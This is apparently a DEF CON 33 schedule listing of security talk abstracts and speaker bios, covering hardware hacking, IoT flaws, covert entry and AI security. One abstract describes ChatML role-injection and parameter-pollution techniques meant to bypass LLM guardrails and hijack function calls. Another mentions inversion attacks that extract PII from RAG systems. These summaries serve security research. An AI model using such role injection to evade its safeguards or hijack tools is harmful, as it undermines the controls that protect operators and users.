Something to read NFC cards.
There is no pre-qualifier to the Ham Radio Fox Hunt.
- ics Calendar file
In this talk, we'll explore how Ham radio can help facilitate open and uncensored communications in situations where traditional communications strictly controlled or even blacked out.
With risks presented by the current global political landscape, Ham radio (amateur radio) has been a powerful tool for communication, especially where governments impose strict control over traditional and digital communication channels.
SpeakerBio: Nate "N8MOR" MooreNate Moore, call sign N8MOR, is an active member of the Ham Radio Village. He serves on the club's board and has contributed to various club activities.
Professionally, Nate has over 25 years of experience in the Information Security field and holds multiple certifications. He has shared his expertise with the amateur radio community through presentations on cybersecurity as well as the amateur radio hobby.
- ics Calendar file
Want to learn how to pick handcuffs? This talk is for you!
SpeakerBio: Steven
- ics Calendar file
As automobiles increase their reliance on advanced connectivity and autonomy systems, they become more vulnerable to cyber-attacks. This class introduces participants to car hacking with in-depth case studies of automotive security research and guided, hands-on activities to instill mastery in the use of automotive technologies such as CAN and diagnostic protocols such as UDS and XCP. All hardware and software needed for the course is supplied by the instructor.
Participants will learn:
Kamel Ghali is an 8 year veteran of the automotive cybersecurity industry and the VP of international affairs of the Defcon Car Hacking Village. He has extensive cyber physical systems security experience and has worked as a vehicle penetration tester, security consultant, and trainer in the United States and Japan. He speaks fluent English, Arabic, and Japanese, and volunteers in cybersecurity communities around the world spreading awareness for the need for cybersecurity in transportation systems.
- ics Calendar file
As automobiles increase their reliance on advanced connectivity and autonomy systems, they become more vulnerable to cyber-attacks. This class introduces participants to car hacking with in-depth case studies of automotive security research and guided, hands-on activities to instill mastery in the use of automotive technologies such as CAN and diagnostic protocols such as UDS and XCP. All hardware and software needed for the course is supplied by the instructor.
Participants will learn:
Kamel Ghali is an 8 year veteran of the automotive cybersecurity industry and the VP of international affairs of the Defcon Car Hacking Village. He has extensive cyber physical systems security experience and has worked as a vehicle penetration tester, security consultant, and trainer in the United States and Japan. He speaks fluent English, Arabic, and Japanese, and volunteers in cybersecurity communities around the world spreading awareness for the need for cybersecurity in transportation systems.
- ics Calendar file
Origins of Hard Hat Brigade (why), the who / what / how
Speakers:MrBill,M0nkeyDrag0n,Hydrox,CoD_SegfaultMrBill started Wardriving in 2003 after attending DC11 and started contributing to Wigle in 2007. He took a break for about a decade (kids) and started up again in 2017 in earnest, and later founded the HardHatBrigade WiGLE group. He passed D4rkM4tter in the global rankings around 2022 and continues to trail @CoD_Segfault in their race to 1 Million WiGLE points. He is often seen at security conferences with a hard hat, mostly with some sort of wardriving functionality. Join him and the rest of the HHB crew in the 24 Hour wardriving event in October.
SpeakerBio: M0nkeyDrag0n, Organizer at Hard Hat BrigadeM0nkeydrag0n plays a blue teamer by day and a Hard Hat Bridage member in the after hours. Having spent a decade in IT support before shifting to his current role, m0nkeydrag0n has spent the last few years growing professionally as a cyber security engineer and endeavors to share tactics, approaches and stories with those looking to make that shift into security as well…or any pivot for that matter!
Lately, rediscovering R/C vehicles as allowed him to take flight, if only by FPV. But playing with RF is always fun, whether it’s trying to catch folks on WiGLE, designing cases for wardriving kits, earning his ham tech cert or just enjoying motorcycles for a long ride…and internet points!
Come wardrive with the Hard Hat Brigade!
SpeakerBio: Hydrox, Organizer at Hard Hat BrigadeCoD_Segfault first went wardriving around 2004, but really kicked up the game in 2021 when joining HardHatBrigade on WiGLE. By 2023, his focus shifted to smaller and more portable wardriving solutions suitable for walking and bike riding. Notable works include ultra small ESP32 wardrivers based on the wardriver.uk project and creation of the BW16-Open-AT project to improve network identification and remove reliance on the closed-source AT firmware.
- ics Calendar file
Every day our lives become more connected to consumer hardware. Every day the approved uses of that hardware are reduced, while the real capabilities expand. Come discover hardware hacking tricks and tips regain some of that capacity, and make your own use for things! We have interactive demos to help you learn new skills. We have challenges to compete against fellow attendees. We have some tools to help with your fever dream modifications. Come share what you know and learn something new.
- ics Calendar file
Curious about hacking chips using fault-injection? Take your first steps in our (free) glitching workshops! We provide you with hardware & guidance to conduct your first fault-injection attacks, all you need is a laptop running Python & OpenOCD: Reproduce the nRF52 "AirTag" glitch or learn how to glitch one of the chips used in crypto-wallets to store millions of dollars.
- ics Calendar file
Don’t know how to make a network cable and want to learn? Has it been years? Or do you think you’re a pro? Come see if you can… make the best cable at con by cut/wire/crimp.
- ics Calendar file
Have I Been Ransomed? is a specialized security service, akin to Have I Been Pwned, designed to detect personal data exposure specifically from ransomware leaks. As ransomware attacks increasingly involve data theft and public dumping, individuals need a way to check if their personally identifiable information has been compromised. Our platform goes beyond standard database checks by processing a wide array of leaked file types, including PDFs, documents, and text files. We employ advanced optical character recognition coupled with sophisticated large language models to meticulously scan unstructured data and extract sensitive identifiers such as national ID cards, driver’s licenses, and social security numbers. Have I Been Ransomed? provides critical awareness, empowering users to discover if their sensitive information has been exposed in a ransomware incident and enabling them to take proactive steps against potential identity theft and fraud.
SpeakerBio: Juanma "M4C" TejadaJuanma is a telecommunications engineer with a profound passion for drone technology and the complexities of hacking. His journey into the cybersecurity realm began unconventionally. Initial explorations through various online forums, driven by early curiosities, unexpectedly ignited a deep interest in the mechanics of data leaks, system breaches, and the evolving tactics of ransomware groups. This non-traditional path provided firsthand exposure to the cyber underground, equipping him with practical, real-world insights into attacker motivations and methodologies. This unique background grants him a grounded perspective, making him well-qualified to discuss the practical applications and implications within the current cybersecurity landscape.
- ics Calendar file
"Hack it if you can" Challenge: HavocAI is challenging hackers at DEF CON 33 to find vulnerabilities and exploits in their "Rampage" Autonomous Surface Vessel software and hardware, offering a $5,000 prize for the best cyber minds who demonstrate exploits. This initiative aims to strengthen the security of autonomous vessels for national security purposes. Pre-registration and US citizenship (with passport) are required to participate.
SpeakerBio: Daniel Morrisey, HavocAI
- ics Calendar file
A place for people with disabilities to hear talks aimed at hacking disabilities / gear / specific topics on security and safety. To have a place to recharge assistance devices, get assistance with disability issues, to have a safe space to retreat should things get to be too much, to form community bonds with other hackers with disabilities and to be an educational outreach and support system showing that just because you have a disability you can still be a hacker and part of the community. Also a break area for service animals, and people with sensory issues.
- ics Calendar file
In this talk, we dive into a world of webcams that secretly run Linux. What started as a casual curiosity turned into a deep dive into embedded Linux systems, obscure supply chains, and alarming security oversights.
Along the way, we discovered how decisions made far upstream – by silicon vendors and OEMs – can introduce vulnerabilities that quietly ship in tens of thousands of devices.
This presentation explores the broader implications of insecure firmware, broken update mechanisms, and the surprising autonomy of devices many assume to be simple peripherals.
We share how we traced the tech stack from brand-name distributors back to little-known chipset manufacturers, and what that journey revealed about responsibility, transparency, and the risks of neglecting security at the hardware-software boundary.
Come for curiosity, stay for the demos and laughs.
Speakers:Mickey Shkatov,Jesse MichaelMickey has been involved in security research for over a decade, specializing in breaking down complex concepts and identifying security vulnerabilities in unusual places. His experience spans a variety of topics, which he has presented at security conferences worldwide. His talks have covered areas ranging from web penetration testing to the intricacies of BIOS firmware.
SpeakerBio: Jesse MichaelJesse is an experienced security researcher focused on vulnerability detection and mitigation who has worked at all layers of modern computing environments from exploiting worldwide corporate network infrastructure down to hunting vulnerabilities inside processors at the hardware design level. His primary areas of expertise include reverse engineering embedded firmware and exploit development. He has also presented research at DEF CON, Black Hat, PacSec, Hackito Ergo Sum, Ekoparty, and BSides Portland.
- ics Calendar file
Gaining access isn’t always about having the perfect pretext. Sometimes, it’s about recognizing subtle shifts in the environment, reading behavioral cues, and adapting on the fly. The best social engineers, like master photographers, don’t just plan—they wait for the decisive moment and take action when the time is right.
This session unpacks a real-world infiltration where success wasn’t about meticulous scripting, but about understanding when and how to pivot in real time. By integrating principles from photography, literature, theater, and deception, we explore how presence, timing, and perception shape the art of infiltration.
SpeakerBio: Daniel Isler, Awareness & Social Engineering Consultant - Team Leader - Dreamlab TechnologiesBachelor in Arts of Representation. With certifications in Social Engineering, Red Team & OSINT. Team Leader of Fr1endly RATs, the Social Engineering unit at Dreamlab Technologies Chile. Specializing and developing techniques and methodologies for simulations of Phishing attacks, Vishing, Pretexting, Physical Intrusions and Red Team.
- ics Calendar file
Large-language-model wrappers increasingly rely on the “ChatML” format to segregate system, assistant, and user roles, yet those delimiters introduce a critical appsec flaw: there is a role hierarchy but no ChatML/server-side RBAC or parameter-level trust boundary built in to ChatML or its chat-completions JSON wrapper. Any client that can speak ChatML can also impersonate privilege, similar to the logical flaws of early-2000s webapps. To make it worse: everybody and their mother forked this thing with roles/privileges but no built-in RBAC pioneered by leading model providers.
In twenty minutes we will walk through the anatomy of that oversight and unveil three vendor-agnostic role-injection techniques that bypass guardrails, trigger unbounded consumption, and hijack function calls in under 50 tokens. We then pivot to parameter pollution, showing how key overrides (temperature, system, tools) can be further used to abuse agents.
OWASP AAI001: Agent Authorization and Control Hijacking
Speakers:Anit Hajdari,Armend Gashi,zizkillHi, I'm Anit Hajdari, a Security Consultant at Sentry with nearly two years of hands-on experience in the cybersecurity field. Throughout my career, I've been involved in a wide range of security assessments, including internal and external network penetration testing, as well as web and mobile application security evaluations. More recently, I've expanded my expertise into the emerging area of Large Language Model (LLM) penetration testing, staying ahead of the curve as AI technologies evolve. My work focuses on identifying vulnerabilities, delivering actionable insights, and helping organizations strengthen their overall security posture.
SpeakerBio: Armend GashiArmend Gashi is Managing Security Consultant at Sentry. With over 5 years in the industry, he specialized in application security and AWS cloud assessments. Armend also performed AI red teaming engagements and developed multi-agent systems to perform security-focused tasks such as code auditing and exploit development.
SpeakerBio: zizkillRobert Shala is co-founder of Sentry, where he leads 50 security consultants and has delivered 2000-plus red-team and appsec engagements for some of the world largest organizatons. He also contributes as a AI Red Teamer for a major AI model developer, probing frontier models for safety and security flaws.
Robert holds an M.S. in Security Studies from Georgetown, a B.S. from RIT, and has a passion for wargaming.
- ics Calendar file
Bring your best and brightest costume, clothing, displays, and toys to show off and earn the adoration of the masses.
- ics Calendar file
The Bio / medical industry creates huge amounts of data—vital-sign streams, imaging, clinician notes— Knowledge base requirements are very heavy, so a little help from a specialized llm can boost the productivity alot. Our new layered technology, accomplishes just this
Hardware layer: A customized CM5 board, an RP2040 co-processor, and a sunlight-readable E-ink display strike the sweet spot LLM entirely on-device + many other transcription models + TTS models.
Software layer – Our “MCP Hub” turns plain-language requests like “track heart rate every five minutes” into a reliable data log, even when Wi-Fi is down. With the help of AI coding, any sensor can start to work within 5min.
SpeakerBio: PamirAIKevin & Tianqi are veteran engineers from Microsoft Surface devices and Qualcomm’s efficient-AI—that is miniaturizing enterprise-grade inference into badge-sized hardware, they designed the hardware + software of distiller, and enclosure to squeeze 3-billion-parameter language models into a 10-Watt, pocket-safe form factor, giving clinicians instant, private access to AI reasoning right at the bedside.
- ics Calendar file
As digital systems increasingly control the world’s most powerful machines, software failures have become a silent but deadly threat—sometimes with fatal consequences. This DEFCON presentation dives deep into maritime and military incidents where software errors, automation missteps, and human-computer interface flaws have led to catastrophic outcomes. Reviewing the USS Yorktown’s infamous “Smart Ship” crash and the USS Vincennes’ tragic misidentification of a civilian airliner, we dissect how code, configuration, and design choices can escalate into life-or-death situations at sea. We’ll also draw parallels to high-profile aviation incidents like the Boeing 737 Max and F-35, illustrating common threads in software assurance failures across domains. We’ll walk through how a subtle software flaw could be exploited to disrupt critical vessel operations, and what this means for the future of maritime cybersecurity. Attendees will gain insight into the technical, organizational, and ethical challenges of securing mission-critical systems, and leave with practical takeaways for hackers, engineers, and policymakers seeking to prevent the next digital disaster on the high seas.
Speakers:Michael DeVolld,Austin ReidWith 25 years of experience in the maritime sector, Michael is dedicated to ensuring the safety and security of the global Maritime Transportation System (MTS). A retired US Coast Guard Officer, he has conducted numerous safety and compliance inspections, investigated high-profile marine casualties, and established a cybersecurity program at USCG Cyber Command. Previously, as a Business Information Security Officer for Royal Caribbean Group, Michael developed strategies to maintain the cybersecurity and regulatory compliance of the company's global cruise fleet. Holding a B.S. in Computer Science and an M.S. in Telecommunications, he currently serves as ABS Consulting's Maritime Cybersecurity Director. In this role, he specializes in managing cyber risks, implementing technical solutions, shaping policy and governance, providing expert advisory services, and designing custom solutions to meet maritime regulatory requirements and best practices.
SpeakerBio: Austin Reid, ABS GroupAustin Reid is a senior consultant at ABS Consulting specializing in securing maritime operational technology with 10 years experience in the Maritime sector from breakbulk, automated container terminal ops, and securing critical vessel systems for all types of ships. He is also a hacker, and security researcher specializing in maritime navigation control systems.
- ics Calendar file
Welcome to the “fun” world of IoT, where security is often an afterthought and vulnerabilities lurk around every corner. This presentation is a guide for vendors on what not to do when designing IoT devices and a survival manual for users to spot insecure gadgets.
Ever wondered if your IoT device is spilling your home WiFi secrets to the cloud over HTTP? Spoiler alert: maybe :)
Pairing your device over open WiFi and HTTP while providing your home WiFi credentials? Just to vacuum clean your home?
How about IoT devices lying about their Android version? But don’t worry, it already comes with malware pre-infected.
Wouldn’t it be nice to access the clear-text admin passwords before authentication? How about multiple different ways to do that?
Would you like to see reverse engineering an N-day command injection vulnerability in the login form of a popular NAS device?
What could be the easiest way to figure out the (static) AES encryption key for a home security alarm solution? Just RTFM!
Why bother with memory corruption when command injection is still the king of IoT threats? I'll break it down for you, with an analysis of challenges with scalable IoT memory corruption exploits, and the challenges with blind ROP.
Last but not least, let’s discuss why Busybox is “not the best” choice for IoT development.
Zoltan (@zh4ck) is a Principal Vulnerability Researcher at CUJO AI, a company focusing on smart home security. Previously he worked as a CTO for an AV Tester company, as an IT Security expert in the financial industry, and as a senior IT security consultant. He is also the developer of the Hardware Firewall Bypass Kernel Driver (HWFWBypass), the Encrypted Browser Exploit Delivery tool (#IRONSQUIRREL) and the Sandbox tester tool to test Malware Analysis Sandboxes, and is partially “responsible” for an IoT botnet infecting 600K devices.
I am a big fan of offsec certs, currently holding OSEP, OSED, OSCE, OSCP, and OSWP.
- ics Calendar file
"How NOT to Perform a Covert Entry Assessment" is a no B.S. discussion that covers what not to do during covert entry engagements--highlighting real-world mistakes, busted Hollywood myths, and missteps that compromise success. We’ll walk through effective techniques for physical site surveys, face-to-face social engineering, and real-time troubleshooting when things go sideways. Attendees will be encouraged to share experiences and lessons learned in an open, interactive format. We’ll also demo our covert entry tools, and discuss how to deliver reliable results to both commercial and high-security government clients.
Speakers:Brent White,Tim RobertsBrent is a Sr. Principal Security Consultant / Covert Entry Specialist with Dark Wolf Solutions, specializing in social engineering and Red Team-style security assessments for both commercial and Department of Defense clients, as well as his contributions towards the development the drone hacking methodology for the Defense Innovation Unit's "Blue sUAS" initiative. He also served as a trusted adviser for the TN Dept of Safety and Homeland Security on the topic of physical and cyber security and has held the role of Web/Project Manager and IT Security Director for a global franchise company as well as Web Manager and information security positions for multiple TV personalities.
He has also been interviewed on the popular web series, “Hak5” with Darren Kitchen, Security Weekly, BBC News, featured with Tim Roberts on the popular series "ProfilingEvil" by Mike King, and on Microsoft’s “Roadtrip Nation” television series. His experience includes Internal/External Penetration, Network evasion, Wireless, Web Application, Drone and Physical Security assessments, and Social Engineering.
Brent has also spoken at numerous security conferences, including ISSA International, DEF CON, Black Hat, DerbyCon, multiple "B-Sides" conference events, Appalachian Institute of Digital Evidence conference at Marshall University, and many more.
SpeakerBio: Tim Roberts, WeHackPeople.com / Dark Wolf SolutionsTim is a Covert Entry Specialist with Dark Wolf Solutions and Sr. Principal Penetration Tester. He is the founding member of the Lexington DEF CON group (DC859). He has been interviewed on the subject of “White hat hacking” for Microsoft’s “Roadtrip Nation” television series, was featured on IDG Enterprise’s CSO Online publication by Ryan Francis on social engineering, and was interviewed at Black Hat by HelpNetSecurity on security awareness and “Know Your Adversary”. He and Brent White have also been featured a couple of times on the true crime series Profiling Evil with Mike King.
Tim has over fifteen years of professional security experience and has held management, IT, and physical security roles across multiple industries, including healthcare, finance, and government. His experience includes Red Team, Internal/External Network, Wireless, Application, Physical Security, Social Engineering, and more.
Tim has spoken and conducted training at numerous security and hacker conferences, including ISSA International, DEF CON, DerbyCon, NolaCon, various B-Sides, CircleCityCon, Techno Security Con, SaintCon, Appalachian Institute of Digital Evidence at Marshall University, Who’s Your Hacker, was keynote for the S&H Law – FBI/Hacker Panel, and more. By continuing to share these experiences, he hopes to further contribute to the InfoSec community and security awareness as a whole.
- ics Calendar file
The US Digital Millennium Copyright Act (DMCA) broadly prohibits defeating technical measures used to protect copyrighted material, including software. Unfortunately, this can encompass ordinary reverse-engineering and other techniques routinely employed by researchers to examine software-based systems for security vulnerabilities. In 2017, the US Copyright Office enacted a temporary exemption permitting "good faith security research" under some circumstances. This talk will explore what conduct the exemption does and doesn't cover, and how the exemption helps protect the ability for election security researchers to do their work. The talk will include generous time for questions.
SpeakerBio: Tori Noble, Electronic Frontier FoundationTori Noble is a Staff Attorney at the Electronic Frontier Foundation. She works on a wide array of intellectual property and civil liberties issues arising from the use of emerging technologies. Tori came to EFF from Dentons US LLP, where she maintained an active litigation and counseling practice centered on First Amendment, privacy, and intellectual property issues. Prior to joining Dentons, Tori worked as a First Amendment fellow at First Look Institute, where she represented The Intercept and its reporters in public records cases and counseled journalists, editors, and filmmakers on a wide range of newsgathering, libel, privacy, and intellectual property issues. During law school, Tori interned at EFF and served as a Google Policy Fellow at the Reporters Committee for Freedom of the Press. Tori holds a J.D. from Stanford Law School and a B.A. from the University of Michigan Gerald R. Ford School of Public Policy.
- ics Calendar file
HUMINT is one of the most powerful, yet least understood tools in cyber threat intelligence. This talk will walk through the full lifecycle of a deep cover HUMINT operation—from identifying high-value sources, to crafting believable personas, navigating forum dynamics, and extracting intelligence through direct engagement with threat actors. We’ll explore how these operations provide early warning of attacks, insights into actor motivations, and access to tools before they’re deployed. But going undercover isn’t without risk. We’ll cover the technical and psychological challenges, OPSEC fundamentals, and ethical dilemmas that define this high-stakes work. Attendees will learn how to map underground communities, build credibility, and collect actionable intelligence without blowing cover. With real-world examples and field-tested strategies, this session offers a rare look inside the human side of CTI—where trust, deception, and tradecraft matter more than tooling. For anyone serious about adversary engagement, this is where the automation ends—and infiltration begins.
Speakers:Sean Jones,Kaloyan IvanovSean Thomas Jones is an accomplished Senior Information Security Professional with decades of experience in successfully stopping hackers, securing networks and applications by using best practices, tools and technologies. He currently works as a Sr Manager with a Threat Intelligence Analyst team to protect the cyber and physical assets of governmental, corporate and high profile individuals.
SpeakerBio: Kaloyan Ivanov
- ics Calendar file
Security research has been focused on securing well-known, widely replicated ecosystems where problems and solutions are shared across the industry. But what happens when you build something no one else has? How do you secure an architecture that's both proprietary and deployed at billion-core scale?
In 2016, NVIDIA began transitioning its internal Falcon microprocessor, used in nearly all GPU products, to a RISC-V based architecture. Today, each chipset has 10-40 cores, and in 2024, NVIDIA surpassed 1 billion RISC-V cores shipped. This success came with unique security challenges, ones that existing models couldn't solve.
To address them, we created a custom SW and HW security architecture from scratch. Including a purpose-built Separation Kernel SW, novel RISC-V ISA extensions like Pointer Masking, IOPMP (later ratified), and unique secure boot and attestation solution. But how do you future-proof a proprietary ecosystem against tomorrow's threats?
In this talk, we'll share what we learned, and what's next. From HW-assisted memory safety (HWASAN, MTE) to control-flow integrity (CFI) and CHERI-like models, we'll explore how NVIDIA is preparing not only its RISC-V ecosystem for the evolving threat landscape. If you care about real-world security at an unprecedented scale, this is a journey you won't want to miss.
References:
Adam ‘pi3’ Zabrocki is a Director of Offensive Security at NVIDIA and specializes in low-level security research. He created Linux Kernel Runtime Guard (LKRG) project defended by Openwall and has worked in Microsoft, European Organization for Nuclear Research (CERN), HISPASEC Sistemas (virustotal.com), Wroclaw Center for Networking and Supercomputing, Cigital and more. Adam has contributed to numerous projects, found vulnerabilities in various systems (including Hyper-V, KVM, RISC-V ISA, Intel's Reference Code, Intel/NVIDIA vGPU, Linux kernel, FreeBSD, OpenSSH, gcc SSP/ProPolice, Apache), and published research in Phrack Magazine. He serves as Vice-Chair of the RISC-V J-extension group and has developed key security extensions for RISC-V (Pointer Masking/HWASAN, Control Flow Integrity) currently working on Memory Tagging. Coauthor of a Windows Internals and twice nominated for The Pwnie Awards, he has spoken at major security conferences like Blackhat and DEF CON, Security BSides, more
SpeakerBio: Marko MiticMarko is a Software Security Architect and System Software Manager focused on secure system design and product security, currently managing NVIDIA’s Core RISC-V team. For the past 10 years at NVIDIA he worked on designing key security aspects for the core system software architecture and drove offensive security practices for GPU system software. He was Security and Risk Officer and PSIRT lead responsible for driving and tracking PSIRT issues and developing remediation plans. In the recent years, his focus was RISC-V, where he has been driving NVIDIA’s RISCV security architecture and implementation, bringing NVRISCV TEE to fruition in shipping NVIDIA products. Motivated by incident response experience, he now passionately leads the adoption of Ada/SPARK, formally verifiable programming language, as powerful tools for reducing security risks in NVIDIA’s most critical software components.
- ics Calendar file
Our human registration process this year will be very similar to previous years. Please be patient. All of the times listed here are approximate.
A badge is required for each human age 8 and older.
You are a human if you do not know otherwise. People that are not humans include goons, official speaker, village/community/contest/creator staff, press, black badge holders, or similar. If you are not a human, you need to register separately. If you don't know how, see an NFO goon (NFO Node, formerly known as an infobooth, is where you can get help). The remainder of this message applies only to humans.
Linecon is your optional opportunity to stand (or sit) in line for human registration to open. Doors will open for linecon on Wednesday at approximately 17:00. When human registration opens on Thursday at approximately 08:00, they start working the linecon queue, and the line will start moving quickly. (Please understand that we will begin processing the line on Thursday morning as soon as the cashiers and materials are in place; we will strive for Thursday 08:00, but actual start may be slightly earlier or later.)
Online badge purchase (aka pre-registration) has no impact on linecon. You can join the line on Wednesday (if you wish) regardless of whether you purchased a badge online or intend to pay with cash. There is only one linecon for both types of badge sales.
Please help us make this a great experience for everyone by following directions given by goons. After human registration opens, there may be one line for all of registration, or there may be two lines (one for online sales (pre-registration) and one for cash sales). This may also change over time, based on available staffing and necessary crowd control. We will strive to make it easily understandable in-person as to which line you should join.
You will be emailed a QR code to the email address provided when you bought your badge. Please guard that QR code as though it is cash -- it can only be redeemed once, and anyone can redeem it if they have it (including a photo of it). Badges are picked-up on-site -- they will not be mailed or shipped.
We can scan the QR code either from your phone's display or from a printed copy. You must have the QR code with you in order to obtain your badge. As you approach the front of the line, if you are going to show your QR code on an electronic device, please ensure that your display is set to maximum brightness.
If you pre-registered, but ultimately are unable to attend DEF CON and want to cancel your purchase, the only way to get a refund is from the original online source. We are unable to provide any refunds on-site at DEF CON. There is a fee to have your badge canceled: $34 before July 18, and $84 on and after July 18.
Online purchases are provided a receipt via email when the purchase is made.
Online purchase -- often referred to as pre-registration -- does not allow you to skip any line/queue to pick up your badge. Once you arrive on-site, you will need to join the existing line for human registration. There may or may not be a dedicated line for pre-registration badge pickup, depending on when you arrive, how long the line is, available staff, etc.
Badges will be available for purchase on-site at DEF CON. All badge sales are cash only. No checks, money orders, credit cards, etc., will be accepted. In order to keep the registration line moving as quickly as possible, please have exact change ready as you near the front of the line.
There are no refunds given for cash sales. If you have any doubt about your desire to buy a badge, please refrain from doing so.
We are unable to provide printed receipts at the time of the sale. A generic receipt for the cash sale of a badge will be made available on media.defcon.org after the conference. You are welcome to print your own copy of the receipt on plain paper.
If you've purchased a DEF CON badge as part of your Black Hat registration, you're in luck - you will be able to pick up your DEF CON badge at Black Hat on Thursday. Please bring your Black Hat badge and watch for emails from Black Hat about where exactly the badge pickup will be. There will be DEF CON goons at Mandalay at the pickup desk to help out and answer questions.
Please note that DEF CON is not able to access or verify Black Hat registration or attendee info. DEF CON's preregistration list is not the same as Black Hat's. For help, ask at Black Hat registration or the concierge area.
Want to buy multiple badges? No problem! We're happy to sell you however many badges you want to pay for.
If you lose your badge, there is unfortunately no way for us to replace it. You'll have to buy a replacement at full price. Please don't lose your badge. :(
If you are being accompanied by a full-time caretaker (such as someone who will push your wheelchair, and will accompany you at all times), please ask to speak to a Registration Goon. Your caretaker will receive a paper badge that will permit them to accompany you everywhere you go.
If you have questions about anything regarding human registration that are not addressed here, please ask to speak to a Registration Goon.
- ics Calendar file
What if AI could perform autonomous vulnerability research? In this talk, we explore how close we are to that future and what it takes to get there.
We demonstrate how AI agents, powered by LLMs and custom tooling, can analyze Android applications, uncover advanced vulnerabilities, and assist in exploit development. Starting with our open-source JADX MCP plugin (https://github.com/mobilehackinglab/jadx-mcp-plugin) for static analysis, we show how AI can reason about app structure and already find real-world vulnerabilities.
This presentation walks through lessons learned, and what’s possible when you stop treating AI as just a chatbot.
SpeakerBio: Umit Aksu, Mobile Hacking LabUmit Aksu is the founder of Mobile Hacking Lab, the leading platform for hands-on offensive mobile security training. With over a decade of experience in offensive security, reverse engineering, and vulnerability research, Umit has led red teams, built security programs at companies like Microsoft and ING Bank, and trained hundreds of professionals through Black Hat USA, Black Hat Asia, and his own platform.
He is also the creator of Djini AI, a cutting-edge platform that automates vulnerability discovery in closed-source mobile apps and firmware using agentic AI. His current research focuses on mobile fuzzing, exploitation and building automated AI systems to scale deep vulnerability discovery.
- ics Calendar file
The “Hunting for Hackers” course provides a baseline level of knowledge designed to train cybersecurity professionals to actively defend critical computer systems. The course exposes participants to a “Think like the Adversary” mindset to actively detect sophisticated and tailored adversary attacks. This course is designed to prepare cybersecurity professionals to Hunt within their network for evidence of adversary presence not previously detected by automated enterprise security devices and software.
Rather than simply reacting to network attacks, participants of this cyber threat hunting training learn methods to interrogate systems and analyze data proactively and remotely. This empowers participants to proactively discover systems targeted by an adversary. Participants learn how to discover malicious code, and evidence of adversary presence and lateral movement within a network. Throughout the program, instructors share their experience in cybersecurity, operations, and tool development. This provides participants an appreciation of the challenges they may face in countering the cyber adversary.
Kyle Smathers is a Specialist Master at Deloitte Risk & Financial Advisory and a seasoned cybersecurity professional with a knack for problem-solving and developing capabilities. He has served as an Air Force officer and continues his service as a reservist, bringing over a decade of experience with cutting-edge cybersecurity platforms, training, and missions. His innovative contributions have gained significant recognition, earning him an invitation to contribute to the design of the Air Force's ‘Interceptor’ cyber threat hunting platform. In his free time, he is either with his family, riding his bicycle or working on a house project.
SpeakerBio: Bobby Thomas, DeloitteBobby Thomas has over 20 years of experience in cyber operations, network analysis, exploitation, and incident response. He possesses a comprehensive background in cyber network operations from planning to execution, intelligence operations, management, technical training course development and revision. Bobby currently works on Deloitte’s Advanced Cyber Training Team, Cyber Assessment Team, and Threat Hunting Team. He has his master’s degree in cyber security and multiple industry leading certifications to include: CISSP, GCFA, GNFA, GCFE, CEH, and Security+. During his off time he enjoys trying new restaurants and traveling with his family.
- ics Calendar file
The “Hunting for Hackers” course provides a baseline level of knowledge designed to train cybersecurity professionals to actively defend critical computer systems. The course exposes participants to a “Think like the Adversary” mindset to actively detect sophisticated and tailored adversary attacks. This course is designed to prepare cybersecurity professionals to Hunt within their network for evidence of adversary presence not previously detected by automated enterprise security devices and software.
Rather than simply reacting to network attacks, participants of this cyber threat hunting training learn methods to interrogate systems and analyze data proactively and remotely. This empowers participants to proactively discover systems targeted by an adversary. Participants learn how to discover malicious code, and evidence of adversary presence and lateral movement within a network. Throughout the program, instructors share their experience in cybersecurity, operations, and tool development. This provides participants an appreciation of the challenges they may face in countering the cyber adversary.
Kyle Smathers is a Specialist Master at Deloitte Risk & Financial Advisory and a seasoned cybersecurity professional with a knack for problem-solving and developing capabilities. He has served as an Air Force officer and continues his service as a reservist, bringing over a decade of experience with cutting-edge cybersecurity platforms, training, and missions. His innovative contributions have gained significant recognition, earning him an invitation to contribute to the design of the Air Force's ‘Interceptor’ cyber threat hunting platform. In his free time, he is either with his family, riding his bicycle or working on a house project.
SpeakerBio: Bobby Thomas, DeloitteBobby Thomas has over 20 years of experience in cyber operations, network analysis, exploitation, and incident response. He possesses a comprehensive background in cyber network operations from planning to execution, intelligence operations, management, technical training course development and revision. Bobby currently works on Deloitte’s Advanced Cyber Training Team, Cyber Assessment Team, and Threat Hunting Team. He has his master’s degree in cyber security and multiple industry leading certifications to include: CISSP, GCFA, GNFA, GCFE, CEH, and Security+. During his off time he enjoys trying new restaurants and traveling with his family.
- ics Calendar file
A Great Talk for Aspiring Security Professionals! Discover how a hobbyist hacker —armed only with curiosity and spare time — took on an active supply-chain attack against the popular FOSS communication tool, Pidgin. In this talk, you’ll learn all about the step-by-step incident response process: from spotting red flags in the code to countering advanced social engineering ploys orchestrated by a crafty threat actor across multiple platforms. It’s a real-world example that shows how anyone — even with zero professional security background — can become an effective defender and give back to the community. If you’ve ever found yourself stuck in the frustrating loop of “How can I get a job if I have no experience because I can’t get a job?”, this session is for you.
SpeakerBio: Johnny Xmas
- ics Calendar file
- ics Calendar file
- ics Calendar file
Illumicon is all about Hackers lighting the Way! Throughout the day attendees will be able control the hands on displays with someone knowledgeable in the field nearby to answer any questions. The displays will include 2 professional laser displays controlled either by either analog or digital and several led fixtures all just waiting for attendees to make them shine. Knowledgeable people will be there to answer questions whether it is hardware, software, sourcing or design. We are here to get you on your way to letting your Blink Flag Fly!!
- ics Calendar file
This talk explores the hidden risks in apps leveraging modern AI systems—especially those using large language models (LLMs) and retrieval-augmented generation (RAG) workflows. We demonstrate how sensitive data, such as personally identifiable information (PII) and social security numbers, can be extracted through real-world attacks. We’ll demonstrate model inversion attacks targeting fine-tuned models, and embedding inversion attacks on vector databases among others. The point is to show how PII scanning tools fail to recognize the rich data that lives in these systems and how much of privacy disaster these AI ecosystems really are.
SpeakerBio: Patrick WalshPatrick Walsh has an over 20 year history of running threat research and engineering teams overseeing products ranging from anti-virus and intrusion prevention to enterprise cloud software. He is a long-time advocate for privacy and security and holds multiple patents in that space. Patrick now leads IronCore Labs, an application data protection platform that uses encryption to protect data stored in the cloud while keeping it searchable and usable. Outside of work, he enjoys the outdoors, photography, hacking, lock picking, biking, swimming, and magic.
- ics Calendar file
